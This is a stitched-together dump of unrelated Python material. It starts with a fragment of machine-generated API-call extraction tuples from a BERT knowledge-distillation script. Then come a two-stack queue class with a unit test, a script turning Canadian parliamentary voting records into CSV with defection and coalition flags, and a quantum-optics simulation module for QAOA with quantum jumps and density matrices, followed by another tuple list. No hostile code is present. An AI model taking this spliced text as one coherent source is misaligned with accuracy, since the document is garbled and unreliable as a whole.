predict_batch_size)\n', (2730, 2807), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler, DistributedSampler\n'), ((2894, 2948), 'tqdm.tqdm', 'tqdm', (['eval_dataloader'], {'desc': '"""Evaluating"""', 'disable': 'None'}), "(eval_dataloader, desc='Evaluating', disable=None)\n", (2898, 2948), False, 'from tqdm import tqdm\n'), ((3487, 3508), 'numpy.array', 'np.array', (['pred_logits'], {}), '(pred_logits)\n', (3495, 3508), True, 'import numpy as np\n'), ((3531, 3550), 'numpy.array', 'np.array', (['label_ids'], {}), '(label_ids)\n', (3539, 3550), True, 'import numpy as np\n'), ((3763, 3807), 'utils_glue.compute_metrics', 'compute_metrics', (['eval_task', 'preds', 'label_ids'], {}), '(eval_task, preds, label_ids)\n', (3778, 3807), False, 'from utils_glue import compute_metrics\n'), ((5690, 5762), 'utils.load_and_cache_examples', 'load_and_cache_examples', (['args', 'args.task_name', 'tokenizer'], {'evaluate': '(False)'}), '(args, args.task_name, tokenizer, evaluate=False)\n', (5713, 5762), False, 'from utils import divide_parameters, load_and_cache_examples\n'), ((7179, 7233), 'torch.load', 'torch.load', (['args.init_checkpoint_S'], {'map_location': '"""cpu"""'}), "(args.init_checkpoint_S, map_location='cpu')\n", (7189, 7233), False, 'import torch\n'), ((8283, 8331), 'utils.divide_parameters', 'divide_parameters', (['params'], {'lr': 'args.learning_rate'}), '(params, lr=args.learning_rate)\n', (8300, 8331), False, 'from utils import divide_parameters, load_and_cache_examples\n'), ((8438, 8640), 'optimization.BERTAdam', 'BERTAdam', (['all_trainable_params'], {'lr': 'args.learning_rate', 'warmup': 'args.warmup_proportion', 't_total': 'num_train_steps', 'schedule': 'args.schedule', 's_opt1': 'args.s_opt1', 's_opt2': 'args.s_opt2', 's_opt3': 'args.s_opt3'}), '(all_trainable_params, lr=args.learning_rate, warmup=args.\n warmup_proportion, t_total=num_train_steps, schedule=args.schedule,\n s_opt1=args.s_opt1, s_opt2=args.s_opt2, s_opt3=args.s_opt3)\n', (8446, 8640), False, 'from optimization import BERTAdam\n'), ((9007, 9201), 'textbrewer.TrainingConfig', 'TrainingConfig', ([], {'gradient_accumulation_steps': 'args.gradient_accumulation_steps', 'ckpt_frequency': 'args.ckpt_frequency', 'log_dir': 'args.output_dir', 'output_dir': 'args.output_dir', 'device': 'args.device'}), '(gradient_accumulation_steps=args.gradient_accumulation_steps,\n ckpt_frequency=args.ckpt_frequency, log_dir=args.output_dir, output_dir\n =args.output_dir, device=args.device)\n', (9021, 9201), False, 'from textbrewer import DistillationConfig, TrainingConfig, MultiTeacherDistiller\n'), ((9290, 9357), 'textbrewer.DistillationConfig', 'DistillationConfig', ([], {'temperature': 'args.temperature', 'kd_loss_type': '"""ce"""'}), "(temperature=args.temperature, kd_loss_type='ce')\n", (9308, 9357), False, 'from textbrewer import DistillationConfig, TrainingConfig, MultiTeacherDistiller\n'), ((9486, 9551), 'functools.partial', 'partial', (['BertForGLUESimpleAdaptor'], {'no_logits': '(False)', 'no_mask': '(False)'}), '(BertForGLUESimpleAdaptor, no_logits=False, no_mask=False)\n', (9493, 9551), False, 'from functools import partial\n'), ((9576, 9737), 'textbrewer.MultiTeacherDistiller', 'MultiTeacherDistiller', ([], {'train_config': 'train_config', 'distill_config': 'distill_config', 'model_T': 'model_Ts', 'model_S': 'model_S', 'adaptor_T': 'adaptor', 'adaptor_S': 'adaptor'}), '(train_config=train_config, distill_config=\n distill_config, model_T=model_Ts, model_S=model_S, 
adaptor_T=adaptor,\n adaptor_S=adaptor)\n', (9597, 9737), False, 'from textbrewer import DistillationConfig, TrainingConfig, MultiTeacherDistiller\n'), ((10019, 10124), 'torch.utils.data.DataLoader', 'DataLoader', (['train_dataset'], {'sampler': 'train_sampler', 'batch_size': 'args.forward_batch_size', 'drop_last': '(True)'}), '(train_dataset, sampler=train_sampler, batch_size=args.\n forward_batch_size, drop_last=True)\n', (10029, 10124), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler, DistributedSampler\n'), ((10143, 10199), 'functools.partial', 'partial', (['predict'], {'eval_datasets': 'eval_datasets', 'args': 'args'}), '(predict, eval_datasets=eval_datasets, args=args)\n', (10150, 10199), False, 'from functools import partial\n'), ((1545, 1570), 'torch.cuda.device_count', 'torch.cuda.device_count', ([], {}), '()\n', (1568, 1570), False, 'import torch\n'), ((2276, 2304), 'os.makedirs', 'os.makedirs', (['eval_output_dir'], {}), '(eval_output_dir)\n', (2287, 2304), False, 'import os, random\n'), ((2599, 2630), 'torch.utils.data.SequentialSampler', 'SequentialSampler', (['eval_dataset'], {}), '(eval_dataset)\n', (2616, 2630), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler, DistributedSampler\n'), ((2661, 2693), 'torch.utils.data.DistributedSampler', 'DistributedSampler', (['eval_dataset'], {}), '(eval_dataset)\n', (2679, 2693), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler, DistributedSampler\n'), ((3621, 3651), 'numpy.argmax', 'np.argmax', (['pred_logits'], {'axis': '(1)'}), '(pred_logits, axis=1)\n', (3630, 3651), True, 'import numpy as np\n'), ((3722, 3745), 'numpy.squeeze', 'np.squeeze', (['pred_logits'], {}), '(pred_logits)\n', (3732, 3745), True, 'import numpy as np\n'), ((5826, 5919), 'utils.load_and_cache_examples', 'load_and_cache_examples', (['args', 'args.aux_task_name', 'tokenizer'], {'evaluate': '(False)', 'is_aux': '(True)'}), '(args, args.aux_task_name, tokenizer, evaluate=False,\n is_aux=True)\n', (5849, 5919), False, 'from utils import divide_parameters, load_and_cache_examples\n'), ((5944, 6010), 'torch.utils.data.ConcatDataset', 'torch.utils.data.ConcatDataset', (['[train_dataset, aux_train_dataset]'], {}), '([train_dataset, aux_train_dataset])\n', (5974, 6010), False, 'import torch\n'), ((6620, 6686), 'modeling.BertForGLUESimple', 'BertForGLUESimple', (['bert_config_T'], {'num_labels': 'num_labels', 'args': 'args'}), '(bert_config_T, num_labels=num_labels, args=args)\n', (6637, 6686), False, 'from modeling import BertForGLUESimple, BertForGLUESimpleAdaptor\n'), ((6886, 6924), 'torch.load', 'torch.load', (['ckpt_T'], {'map_location': '"""cpu"""'}), "(ckpt_T, map_location='cpu')\n", (6896, 6924), False, 'import torch\n'), ((7553, 7608), 'torch.load', 'torch.load', (['args.tuned_checkpoint_S'], {'map_location': '"""cpu"""'}), "(args.tuned_checkpoint_S, map_location='cpu')\n", (7563, 7608), False, 'import torch\n'), ((9911, 9939), 'torch.utils.data.RandomSampler', 'RandomSampler', (['train_dataset'], {}), '(train_dataset)\n', (9924, 9939), False, 'from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler, DistributedSampler\n'), ((2200, 2231), 'os.path.exists', 'os.path.exists', (['eval_output_dir'], {}), '(eval_output_dir)\n', (2214, 2231), False, 'import os, random\n'), ((3186, 3201), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (3199, 3201), False, 'import torch\n'), ((6330, 6396), 
'utils.load_and_cache_examples', 'load_and_cache_examples', (['args', 'eval_task', 'tokenizer'], {'evaluate': '(True)'}), '(args, eval_task, tokenizer, evaluate=True)\n', (6353, 6396), False, 'from utils import divide_parameters, load_and_cache_examples\n'), ((8103, 8133), 'torch.nn.DataParallel', 'torch.nn.DataParallel', (['model_S'], {}), '(model_S)\n', (8124, 8133), False, 'import torch\n'), ((1470, 1495), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (1493, 1495), False, 'import torch\n'), ((8025, 8055), 'torch.nn.DataParallel', 'torch.nn.DataParallel', (['model_T'], {}), '(model_T)\n', (8046, 8055), False, 'import torch\n')]
|
import unittest
"""
Implement a queue with 2 stacks.
Your queue should have an enqueue and a dequeue function and it should be "first in first out" (FIFO).
"""
class SelfImplementQueue:
    def __init__(self):
        # Use instance attributes so each queue gets its own storage.
        self.stack1 = []
        self.stack2 = []
def enqueue(self, item):
"""
Adds a new item to the queue.
:param item:
The item to add to the queue.
"""
self.stack1.append(item)
    def dequeue(self):
        """
        Remove and return the oldest item from the queue.
        """
# Move all values to stack2, in reverse order.
for index in range(len(self.stack1)):
value = self.stack1.pop()
self.stack2.append(value)
        # Remove and remember the oldest value.
        item = self.stack2.pop()
        # Return the remaining values to stack1.
        for index in range(len(self.stack2)):
            value = self.stack2.pop()
            self.stack1.append(value)
        return item
def __str__(self):
return str(self.stack1)
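
    # Illustrative alternative (not part of the original exercise): the classic amortized
    # O(1) variant only transfers elements when stack2 is empty, instead of shuttling them
    # back on every call:
    #
    #     def dequeue(self):
    #         if not self.stack2:
    #             while self.stack1:
    #                 self.stack2.append(self.stack1.pop())
    #         return self.stack2.pop()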
class TestList(unittest.TestCase):
def test_right(self):
queue = SelfImplementQueue()
queue.enqueue(1)
queue.enqueue(2)
queue.enqueue(3)
queue.dequeue()
queue.enqueue(4)
self.assertEqual(str(queue), '[2, 3, 4]')
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main"
] |
[((1383, 1398), 'unittest.main', 'unittest.main', ([], {}), '()\n', (1396, 1398), False, 'import unittest\n')]
|
import csv
import json
import itertools
PARTIES = ['conservative', 'liberal', 'ndp', 'green', 'bloc']
BASE_URL = 'https://www.ourcommons.ca/Parliamentarians/en/votes/%d/%d/%d/'
if __name__ == '__main__':
headers = ['Date', 'Parliament Number', 'Session Number', 'Decision Number',
'Result', 'Decision Type', 'Decision Subject', 'Num Yeas', 'Num Nays', 'Num Paired',
'Conservative Yeas', 'Conservative Nays', 'Liberal Yeas', 'Liberal Nays',
'NDP Yeas', 'NDP Nays', 'Green Yeas', 'Green Nays', 'Bloc Yeas', 'Bloc Nays', 'URL']
for party in PARTIES:
headers.append(party.capitalize() + ' Defections')
for two_party_coalitions in itertools.combinations(PARTIES, 2):
headers.append('%s-%s Coalition' %
(two_party_coalitions[0].capitalize(), two_party_coalitions[1].capitalize()))
for three_party_coalitions in itertools.combinations(PARTIES, 3):
headers.append('%s-%s-%s Coalition' %
(three_party_coalitions[0].capitalize(), three_party_coalitions[1].capitalize(),
three_party_coalitions[2].capitalize()))
csv_output = []
with open("voting_records.json") as f:
for entry in json.load(f):
csv_row = [entry['date'], entry['parliament_number'], entry['session_number'],
entry['decision_number'], entry['result'], entry['decision_type'], entry['decision_subject'],
entry['num_yeas'], entry['num_nays'], entry['num_paired'],
entry['conservative_yeas'], entry['conservative_nays'], entry['liberal_yeas'], entry['liberal_nays'],
entry['ndp_yeas'], entry['ndp_nays'], entry['green_yeas'],
entry['green_nays'], entry['bloc_yeas'], entry['bloc_nays']]
csv_row.append(BASE_URL % (entry['parliament_number'],entry['session_number'],entry['decision_number']))
# Defections
for party in PARTIES:
if entry[party+'_yeas'] > 0 and entry[party+'_nays'] > 0:
csv_row.append('1')
else:
csv_row.append('0')
# 2 party coalitions
for two_party_coalitions in itertools.combinations(PARTIES, 2):
if (entry[two_party_coalitions[0]+'_yeas'] > entry[two_party_coalitions[0]+'_nays'] and
entry[two_party_coalitions[1]+'_yeas'] > entry[two_party_coalitions[1]+'_nays']):
csv_row.append('1')
else:
csv_row.append('0')
# 3 party coalitions
for three_party_coalitions in itertools.combinations(PARTIES, 3):
if (entry[three_party_coalitions[0]+'_yeas'] > entry[three_party_coalitions[0]+'_nays'] and
entry[three_party_coalitions[1]+'_yeas'] > entry[three_party_coalitions[1]+'_nays'] and
entry[three_party_coalitions[2]+'_yeas'] > entry[three_party_coalitions[2]+'_nays']):
csv_row.append('1')
else:
csv_row.append('0')
csv_output.append([str(data) for data in csv_row])
## Sort by date
csv_output.sort(key=lambda x: x[0])
csv_output.insert(0, headers)
with open("processed_data.csv", "w") as outfile:
writer = csv.writer(outfile)
writer.writerows(csv_output)
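
# Illustrative note (not part of the pipeline): itertools.combinations enumerates the party
# pairs/triples in a fixed order, e.g.
#     list(itertools.combinations(['a', 'b', 'c'], 2)) -> [('a', 'b'), ('a', 'c'), ('b', 'c')]
# Because the header loop and the per-row loop iterate in this same order, each coalition
# flag lands under its matching column.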
|
[
"itertools.combinations",
"json.load",
"csv.writer"
] |
[((639, 673), 'itertools.combinations', 'itertools.combinations', (['PARTIES', '(2)'], {}), '(PARTIES, 2)\n', (661, 673), False, 'import itertools\n'), ((825, 859), 'itertools.combinations', 'itertools.combinations', (['PARTIES', '(3)'], {}), '(PARTIES, 3)\n', (847, 859), False, 'import itertools\n'), ((1105, 1117), 'json.load', 'json.load', (['f'], {}), '(f)\n', (1114, 1117), False, 'import json\n'), ((2834, 2853), 'csv.writer', 'csv.writer', (['outfile'], {}), '(outfile)\n', (2844, 2853), False, 'import csv\n'), ((1922, 1956), 'itertools.combinations', 'itertools.combinations', (['PARTIES', '(2)'], {}), '(PARTIES, 2)\n', (1944, 1956), False, 'import itertools\n'), ((2255, 2289), 'itertools.combinations', 'itertools.combinations', (['PARTIES', '(3)'], {}), '(PARTIES, 3)\n', (2277, 2289), False, 'import itertools\n')]
|
import numpy as np
import random,copy
from scipy.sparse import csr_matrix
import scipy.integrate
from numpy import linalg
import time
import settings
import math
####PAULI OPERATORS####
def sigma_x_operator(basis_vector,indices,pos_sigma=-1):
"""Operator that creates the matrix representation of sigma_x."""
    M=sigma_moins_operator(basis_vector,indices,pos_sigma)
return M+np.transpose(M)
def sigma_moins_operator(basis_vector,indices,pos_sigma):
"""
    Operator that creates the matrix representation of sigma_+.
    The variable pos_sigma denotes the position of the sigma_+;
    if pos_sigma=-1, the operation is global.
"""
dim=len(basis_vector)
sigma_x_matrix=np.zeros((dim, dim)) #creation of the output array
for ii in range(dim-1): #Not optimized. We need to implement a 'for basis_vector_loc in basis_vector'
basis_vector_ii=basis_vector[ii]
(n_initial,n_final)=get_indices(basis_vector[ii],indices)
#we look for possible connections in a restricted set, in order to reduce the computation
#time. The function get_indices will return the indices between which to look.
if n_initial<0. or n_final<0.:
continue
for jj in range(n_initial,n_final):
basis_vector_jj=basis_vector[jj]
if pos_sigma>-0.1: #Local sigma_x
loc1=list(copy.copy(basis_vector_ii))
loc1.append(pos_sigma) #we add the index j to the smallest list
if set(loc1) == set(basis_vector_jj):
sigma_x_matrix[ii,jj]=1.
continue
else: #Global sigma_x
if(set(basis_vector_ii).issubset(set(basis_vector_jj))): #here issubset is sufficient because we know that basis_vector_ii and
sigma_x_matrix[ii,jj]=1. #basis_vector_jj only differ by one excitation (thanks to get_indices).
return sigma_x_matrix
def sigma_z_operator(basis_vector,pos=-1):
"""
Operator that creates the matrix representation of sigma_z. As sigma^z is diagonal in the computational basis,
we will only return a vector-type array and later apply element-wise multiplication with the wavefunction
if pos=-1, global operation.
"""
dim=len(basis_vector)
sigma_z_matrix=np.zeros(dim)
#Local operator at position pos
if pos>-0.1:
for jj in range(dim):
if (set([pos]).issubset(set(basis_vector[jj]))):
sigma_z_matrix[jj]=1.
#Global operator, all positions
else:
for jj in range(dim):
leng=len(basis_vector[jj])
sigma_z_matrix[jj]=leng
return sigma_z_matrix
def sigma_z_z_operator(basis_vector,pos_1,pos_2):
"""
Operator that creates the matrix representation of sigma_z(pos_1)sigma_z(pos_2).
As it is diagonal in the computational basis, we will only return a vector-type array and
later apply element-wise multiplication with the wavefunction.
"""
dim=len(basis_vector)
sigma_z_z_matrix=np.zeros(dim)
for jj in range(dim):
if (set([pos_1,pos_2]).issubset(set(basis_vector[jj]))):
sigma_z_z_matrix[jj]=1.
return sigma_z_z_matrix
def get_indices(basis_vector_loc,indices):
"""
This function will return the indices for which the basis vectors are possibly
connected to the input vector by a sigma^x operator. Increasing number of excitations.
"""
n_initial=indices[len(basis_vector_loc)+1]
if not len(basis_vector_loc)+2<len(indices):
return (-1,-1)
n_final=indices[len(basis_vector_loc)+2]
return (n_initial,n_final)
###OBSERVABLES ROUTINES
def expectation_value(psi,H_2):
"""Function that computes the expectation value of H_2. """
Hpsi=np.multiply(H_2,psi)
return np.vdot(psi,Hpsi)
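
# Worked check (illustration only): for a diagonal observable stored as a vector,
# <psi|H_2|psi> = sum_i H_2[i] * |psi[i]|**2. For example,
#     psi = np.array([1., 1.]) / np.sqrt(2.); H_2 = np.array([0., 2.])
#     expectation_value(psi, H_2)  # -> 1.0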
def expected_shortfall(H,psi,H_2,seuil):
"""Function that computes the expected shortfall of H_2. """
val=0.
prob=0.
integer=len(psi)-1
while prob<(seuil-0.00001):
prob+=abs(psi[integer])**2
val+=abs(psi[integer])**2*len(H[integer])
integer-=1
return -val/prob
def expectation_value_rho(rho,H_2):
"""Function that computes the expectation value of H_2. """
    return np.trace(H_2 @ rho)
def expected_shortfall_rho(H,rho,H_2,seuil):
"""Function that computes the expected shortfall of H_2. """
return np.trace(H_2@rho )
#val=0.
#prob=0.
#integer=len(psi)-1
#while prob<(seuil-0.00001):
# prob+=abs(psi[integer])**2
# val+=abs(psi[integer])**2*len(H[integer])
# integer-=1
#return -val/prob
def compute_observable(H,psi,H_2,**kwargs):
"""Function called to evaluate the observable on the wavefunction."""
if settings.type_observable[0]=="energy":
return (expectation_value(psi,H_2)).real
elif settings.type_observable[0]=="cVAR":
if settings.type_observable[1]==0.:
raise ValueError('could not find a positive threshold value for the expected shortfall')
else:
progressive=kwargs.get('var_progressive',False)
if not progressive:
return (expected_shortfall(H,psi,H_2,settings.type_observable[1])).real
else:
seuil_progressive=kwargs.get('seuil_var_progressive',False)
return (expected_shortfall(H,psi,H_2,seuil_progressive)).real
def compute_observable_rho(H,rho,H_detuning,**kwargs):
"""Function called to evaluate the observable on the density matrix."""
H_2=square_mat(H_detuning)
if settings.type_observable[0]=="energy":
return (expectation_value_rho(rho,H_2)).real
elif settings.type_observable[0]=="cVAR":
if settings.type_observable[1]==0.:
raise ValueError('could not find a positive threshold value for the expected shortfall')
else:
            return (expected_shortfall_rho(H, rho, H_2, settings.type_observable[1])).real
####TIME-EVOLUTION ROUTINES#####
def get_derivative(mat_diag,mat_Rabi,**kwargs):
"""Returns function for t-evolution of the wavefunction using scipy.integrate.solve_ivp"""
tunneling=kwargs.get('tunneling','on')
if tunneling=='off':
def H_on_psi_loc(tt,yy):
return -1j*np.multiply(mat_diag,yy)
return H_on_psi_loc
else:
def H_on_psi_loc(tt,yy):
return -1j*np.multiply(mat_diag,yy)-1j*(mat_Rabi @yy)
return H_on_psi_loc
def square_mat(diagonal_matrice):
dim=len(diagonal_matrice)
mat_square=np.zeros((dim, dim),dtype=complex)
for mm in range(dim):
mat_square[mm,mm]=diagonal_matrice[mm]
return mat_square
def get_derivative_density_matrix(mat_diag,mat_Rabi,sigma_moins_array,**kwargs):
"""
Returns function for t-evolution using the numerical integration of the density matrix
    \dot{\rho} = -i(H_eff \rho - \rho H_eff^{\dagger})
                 + \Gamma \sum_j \sigma_j^- \rho \sigma_j^+
"""
dim=len(mat_diag)
tunneling=kwargs.get('tunneling','on')
if tunneling=='off':
def L_on_rho_loc(tt,yy):
yy=np.reshape(yy, (dim,dim))
H_eff=csr_matrix(square_mat(mat_diag))
deriv=-1j*(H_eff @ yy- yy @ (H_eff.conj()).transpose())+settings.Gamma*sum(sig @ yy @ (sig.transpose()) for sig in sigma_moins_array)
return np.reshape(deriv, dim*dim)
return L_on_rho_loc
else:
def L_on_rho_loc(tt,yy):
yy=np.reshape(yy, (dim,dim))
H_eff=csr_matrix(mat_Rabi+square_mat(mat_diag))
deriv=-1j*(H_eff @ yy- yy @ (H_eff.conj()).transpose())+settings.Gamma*sum(sig @ yy @ (sig.transpose()) for sig in sigma_moins_array)
return np.reshape(deriv, dim*dim)
return L_on_rho_loc
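
# Note (illustration): solve_ivp integrates flat vectors, so the right-hand sides above
# reshape the dim*dim vector into a (dim, dim) matrix, apply the master equation, and
# flatten the result back; evol_scipy_rho below performs the matching reshapes around
# the integration call.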
def evol_scipy(psi,mat_diag,mat_Rabi,tf,k,rn=-1,**kwargs):
"""
Main time-evolution function for the wavefunction.
"""
dissipative=settings.dissipation
indices=kwargs.get('indices',0.)
basis_vector=kwargs.get('basis_vector',0.)
mat_Rabi=csr_matrix(mat_Rabi) #The Rabi matrix is a sparse matrix
H_on_psi=get_derivative(mat_diag,mat_Rabi,**kwargs)
t_span=(0.,tf)
#Coherent time-evolution.
if not dissipative:
sol=scipy.integrate.solve_ivp(H_on_psi, t_span, psi, method='RK45',
t_eval=None, dense_output=False,
events=None, vectorized=False)
values=sol.y
psi=values[ : , -1]
#Dissipative time-evolution. Jumps allowed.
else:
if rn<0:
rn=random.random() #random number. if norm(psi)<rn, then jump.
is_norm_positive=get_test_jump(rn) #Automatic stopping of the time-evolution
is_norm_positive.terminal=True #if the norm of psi gets below rn.
finished=False
while not finished:
sol=scipy.integrate.solve_ivp(H_on_psi, t_span, psi, method='RK45',
t_eval=None, dense_output=False,
events=is_norm_positive, vectorized=False)
values=sol.y
psi=values[ : , -1]
if len(sol.t_events[0])<1: #We reached the final time without jump.
finished=True
else: #There is a jump
(type,tab)=compute_jump_probas(psi,basis_vector,k)
m=get_jump_index(tab,k)
(psi,mat_Rabi)=quantum_jump(type,basis_vector,psi,mat_diag,mat_Rabi,indices,m)
#Update of the Hamiltonian, time-span and random number
H_on_psi=get_derivative(mat_diag,mat_Rabi,**kwargs)
t_span=(sol.t[-1],tf)
rn=random.random()
is_norm_positive=get_test_jump(rn)
is_norm_positive.terminal=True
return (psi,mat_Rabi,rn)
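
# Algorithm summary (illustration): the dissipative branch above is the standard Monte Carlo
# wavefunction scheme -- draw rn in (0,1), evolve |psi> under the non-Hermitian effective
# Hamiltonian until ||psi||^2 reaches rn (the solve_ivp event), apply a jump operator sampled
# from compute_jump_probas, renormalize, and resume with a fresh random number.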
def evol_scipy_rho(rho0,matdiag,mat_Rabi,tf,k,**kwargs):
"""
Main time-evolution function for the density matrix.
"""
indices=kwargs.get('indices',0.)
basis_vector=kwargs.get('basis_vector',0.)
mat_Rabi=csr_matrix(mat_Rabi)
sigma_moins_tab=[]
for jjj in k:
sigma_moins_tab.append(csr_matrix(sigma_moins_operator(basis_vector,indices,jjj)))
L_on_rho=get_derivative_density_matrix(matdiag,mat_Rabi,sigma_moins_tab,**kwargs)
t_span=(0.,tf)
rho0=np.reshape(rho0, len(matdiag)*len(matdiag))
sol=scipy.integrate.solve_ivp(L_on_rho, t_span, rho0, method='RK45',
t_eval=None, dense_output=False, vectorized=False)
values=sol.y
rho=values[ : , -1]
rho=np.reshape(rho, (len(matdiag),len(matdiag)))
return rho
#### JUMP routines ####
def get_test_jump(rn):
    """Return the event function used by solve_ivp to stop the evolution once norm(psi)**2 < rn."""
    def norm_positive_loc(t,y):
        return np.linalg.norm(y)**2-rn
    return norm_positive_loc
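#Illustrative sketch (not part of the original module): how the terminal
#event above halts solve_ivp, mirroring the jump detection in evol_scipy.
#The toy ODE decays as y=exp(-t/2), so norm(y)**2=exp(-t) crosses
#rn_toy=0.5 at t=ln(2); names ending in _toy are assumptions for the demo.
#
#   import numpy as np
#   import scipy.integrate
#   rn_toy=0.5
#   event_toy=get_test_jump(rn_toy)
#   event_toy.terminal=True #stop the integration at the first zero crossing
#   sol_toy=scipy.integrate.solve_ivp(lambda t,y: -0.5*y, (0.,10.),
#                                     np.array([1.0]), events=event_toy)
#   #sol_toy.t_events[0][0] is approximately ln(2)=0.693...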
def get_jump_index(tab,k):
    """Draw the jump site from the distribution tab by inverse-CDF sampling (assumes the sites in k are 0..len(tab)-1, in order)."""
    rn2=random.random()
    temp=tab[0]
    m=1
    while temp<rn2 and m<len(tab): #The bound on m guards against rounding in sum(tab).
        temp+=tab[m]
        m+=1
    return k[m-1]
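#Worked example (added for illustration): with tab=[0.2,0.5,0.3] and
#k=[0,1,2], a draw rn2=0.75 accumulates 0.2 -> 0.7 -> 1.0 and stops with
#m=3, so the jump happens at site k[2]; any draw below 0.2 selects k[0].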
def quantum_jump(jump_type,basis_vector,psi_loc,mat_diagloc,mat_Rabiloc,indices,location_jump):
    """Apply a quantum jump; return the new wavefunction and the (possibly modified) Rabi Hamiltonian."""
    if jump_type=="Emission": #Jump by spontaneous emission.
(psi_new,indices_to_delete)=jump_elements(basis_vector,psi_loc,indices,location_jump)
rn=random.random()
        if rn<settings.branching_ratio: #If the decay goes to the uncoupled
            ido=np.identity(mat_Rabiloc.shape[0]) #ground state, we zero the corresponding
            for a in indices_to_delete: #matrix elements, so that further
                ido[a,a]=0. #re-excitation is impossible.
            ido=csr_matrix(ido)
            mat_Rabiloc=ido@mat_Rabiloc@ido #A single projection suffices: ido already zeroes every deleted index.
return (psi_new/np.linalg.norm(psi_new),mat_Rabiloc)
    else: #Jump by dephasing; mat_Rabi is unchanged.
        psi_new=dephasing(basis_vector,psi_loc,location_jump)
        return (psi_new/np.linalg.norm(psi_new),mat_Rabiloc)
def compute_jump_probas(psi,basis_vector,k):
    """Compute the jump probabilities of the sites and the event type, in {Emission, Dephasing}."""
    tab=np.zeros(settings.N)
    G=settings.Gamma #spontaneous-emission rate
    g=settings.gamma_deph #dephasing rate
    rn3=random.random() #Draw the type of event.
    if rn3<=G/(g+G):
        jump_type="Emission"
    else:
        jump_type="Dephasing"
    p_tot=0.
    for mm in k: #We loop over all the possible jump sites.
        H_loc=-1j/2.*sigma_z_operator(basis_vector,mm) #Jump operator of site mm.
        Hpsi=np.multiply(H_loc,psi)
        tab[mm]=abs(np.vdot(psi,1j*Hpsi)) #Unnormalized probability of a jump at mm.
        p_tot+=tab[mm] #Reuse the value instead of recomputing the inner product.
    return (jump_type,tab/p_tot)
def jump_elements(basis_vector,psi_loc,indices,location_jump):
"""
This function will return the new wavefunction after a jump at position location_jump on psi_loc
It will also return the indices of the Hamiltonian to set to zero after the jump if there is a
jump towards the uncoupled ground state.
"""
index_to_delete=[]
psi_new=np.zeros_like(psi_loc)
for ii,basis_vector_loc in enumerate(basis_vector):
        if (set([location_jump]).issubset(set(basis_vector_loc))): #The jump site belongs to the target
            continue                                               #vector --> not affected, skip it.
        (n_initial,n_final)=get_indices(basis_vector_loc,indices) #Indices of the block where the parent state lives.
        if n_initial<0. or n_final<0.: #The parent state does not exist.
            continue
for mm in range(n_initial,n_final):
if set(basis_vector_loc)|set([location_jump])==set(basis_vector[mm]):
psi_new[ii]=psi_loc[mm] #we set the target value to the
index_to_delete.append(mm) #parent value, and add the parent
return (psi_new,index_to_delete) #index to the list for future possible deletion.
def dephasing(basis_vector,psi_loc,location_jump):
"""This function will return the new wavefunction after a dephasing event at position location_jump on psi_loc."""
psi_new=np.zeros_like(psi_loc)
for ii,basis_vector_loc in enumerate(basis_vector):
        if (set([location_jump]).issubset(set(basis_vector_loc))): #The jump site belongs to the target
            continue                                               #vector --> not affected, skip it.
psi_new[ii]=psi_loc[ii] #else, projection.
return psi_new
####RUN routines. Different kinds of evolutions.
def QAOA_single_run_observable(theta,H,psi_l,H_Rabi,H_detuning,H_diss,indices,k,N_max=102,N_min=50,stability_threshold=0.04): #default was settings.stability_threshold
    # TODO: factor the layer loop out to make this function more modular.
p=int(len(theta))
val_tab=[]
for kk in range(N_max):
psi=psi_l
mat_Rabi=H_Rabi
rn=-1
for pp in range(p):
            if pp%2==0: #Even layers: mixing step (Rabi drive only).
                mat_diag=H_diss
(psi,mat_Rabi,rn)=evol_scipy(psi,mat_diag,mat_Rabi,theta[pp],k,rn,basis_vector=H,
indices=indices)
mat_Rabi=H_Rabi
            else: #Odd layers: cost step, with the detuning term included.
                mat_diag=H_detuning+H_diss
if settings.type_evolution=="mixte":
(psi,mat_Rabi,rn)=evol_scipy(psi,mat_diag,mat_Rabi,theta[pp],k,rn,basis_vector=H,
indices=indices)
mat_Rabi=H_Rabi
else:
(psi,mat_Rabi,rn)=evol_scipy(psi,mat_diag,mat_Rabi,theta[pp],k,rn,basis_vector=H,
indices=indices,tunneling='off')
mat_Rabi=H_Rabi
###We compute the observable only at the end of the calculation
psi=psi/np.linalg.norm(psi)
val_tab.append(compute_observable(H,psi,H_detuning))
        ##Stop once the standard error of the mean is below the threshold and at least N_min trajectories have been run.
if np.std(val_tab)/np.sqrt(kk+1.)<stability_threshold and kk>N_min:
return np.mean(val_tab)
return np.mean(val_tab)
def QAOA_single_run_observable_density_matrix(theta,H,rho0,H_Rabi,H_detuning,H_diss,indices,k):
    # TODO: factor the layer loop out to make this function more modular.
p=int(len(theta))
rho=rho0
mat_Rabi=H_Rabi
for pp in range(p):
if pp%2==0:
mat_diag=H_diss
rho=evol_scipy_rho(rho,mat_diag,mat_Rabi,theta[pp],k,basis_vector=H,
indices=indices)
else:
mat_diag=H_detuning+H_diss
if settings.type_evolution=="mixte":
rho=evol_scipy_rho(rho,mat_diag,mat_Rabi,theta[pp],k,basis_vector=H,
indices=indices)
else:
rho=evol_scipy_rho(rho,mat_diag,mat_Rabi,theta[pp],k,basis_vector=H,
indices=indices,tunneling='off')
###We compute the observable only at the end of the calculation
val_obs=compute_observable_rho(H,rho,H_detuning)
return val_obs
|
[
"numpy.trace",
"numpy.zeros_like",
"numpy.multiply",
"numpy.std",
"numpy.vdot",
"numpy.zeros",
"numpy.transpose",
"numpy.identity",
"copy.copy",
"random.random",
"scipy.sparse.csr_matrix",
"numpy.mean",
"numpy.reshape",
"numpy.linalg.norm",
"numpy.sqrt"
] |
